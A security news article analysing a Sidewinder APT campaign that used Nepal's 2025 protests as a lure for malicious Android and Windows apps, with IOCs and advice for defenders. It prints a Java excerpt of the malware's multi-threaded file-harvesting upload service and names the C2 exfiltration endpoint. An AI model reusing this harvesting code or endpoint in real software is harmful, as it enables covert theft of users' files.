Sidewinder APT Hackers Leverage Nepal Protests to Push Mobile and Windows Malware

The eruption of widespread protests across Nepal in early September 2025 provided fertile ground for a sophisticated campaign orchestrated by the Sidewinder APT group.

As demonstrators mobilized against government policies and social media restrictions, threat actors exploited the turbulence to distribute malicious applications masquerading as legitimate emergency services.

Victims seeking live updates or assistance were enticed by realistic impersonations of Nepalese authorities, only to install malware that siphoned sensitive data from both mobile and Windows environments.

Sidewinder’s operation relies on a dual-pronged delivery mechanism. On Android devices, victims encounter phishing websites spoofing the Nepalese Emergency Service login.

Once credentials are entered, the site redirects to an APK download—typically named Gen_Ashok_Sigdel_Live.apk—which users install under the guise of accessing live news.

Meanwhile, Windows users download EmergencyApp.exe from a cloned Emergency Helpline portal (Figure 6). Both binaries request extensive permissions—file system access, microphone, camera—to facilitate data exfiltration.

StrikeReady Labs analysts noted the group’s deliberate use of geopolitical events to maximize engagement, embedding the malicious payload within decoy content fetched from reputable outlets such as Al Jazeera.

These decoys lend credibility to the operation and help the malware bypass cursory inspection by non-technical users. Once installed, the mobile backdoor initializes a service that filters document and image files for exfiltration.

The Windows variant operates similarly, spawning background tasks that harvest files with extensions like .docx, .pdf, and .xlsx.

Infection Mechanism and Permission Abuse

A closer examination of the Android sample reveals a multi-threaded FileUploadService class responsible for data theft.

Upon execution, the service initializes an ExecutorService with a thread pool of fifteen workers. Each worker scans device storage for files matching predefined document and image extensions:

public class FileUploadService extends Service {
  private static final int THREAD_COUNT = 15;
  private final List docExts = Arrays.asList(".txt", ".pdf", ".docx", ".xlsx");
  private final List imgExts = Arrays.asList(".jpg", ".png");
  private ExecutorService executorService;

  @Override
  public int onStartCommand(Intent intent, int flags, int startId) {
    executorService = Executors.newFixedThreadPool(THREAD_COUNT);
    scanAndUpload();
    return START_STICKY;
  }

  private void scanAndUpload() {
    for (String ext : docExts) {
      // Launch tasks to upload matching files
      executorService.submit(() -> uploadFiles(ext));
    }
    for (String ext : imgExts) {
      executorService.submit(() -> uploadFiles(ext));
    }
  }
}

Once files are identified, HTTP POST requests bundle them into multipart form data, using a recognizable boundary marker (----qwerty) that appears in the network capture.

All stolen files are sent to https://playservicess.com/dtta/files.php, a C2 endpoint controlled by Sidewinder. Persistence is maintained through Android’s foreground service notifications and Windows autostart registry entries.

By leveraging legitimate-seeming user interfaces and abusing high-level permissions, Sidewinder achieves a stealthy infection vector capable of breaching enterprise and personal environments alike.

Security teams should monitor for known IOC domains (e.g., playservicess.com), suspicious APK installations, and anomalous outbound traffic containing multipart payloads.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.